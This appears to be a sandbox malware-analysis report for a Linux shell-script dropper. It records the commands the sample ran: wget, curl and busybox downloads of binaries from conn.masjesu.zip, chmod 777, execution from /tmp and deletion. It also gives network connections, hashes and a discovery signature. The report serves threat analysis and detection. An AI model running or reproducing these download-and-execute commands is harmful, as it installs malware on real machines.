[/bin/busybox wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/bin/chmod

[chmod 777 Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM

[./Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/bin/rm

[rm Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/bin/chmod

[chmod 777 o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY

[./o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/bin/rm

[rm o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/bin/chmod

[chmod 777 k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB

[./k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/bin/rm

[rm k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/bin/chmod

[chmod 777 y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi

[./y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/bin/rm

[rm y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/bin/chmod

[chmod 777 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8

[./3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/bin/rm

[rm 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp

Files

/tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-25 01:07

Reported

2024-10-25 01:10

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

148s

Max time network

129s

Command Line

[/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh

[/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
N/A 224.0.0.251:5353 udp
GB 185.125.188.61:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
US 151.101.1.91:443 tcp
GB 195.181.164.14:443 tcp

Files

N/A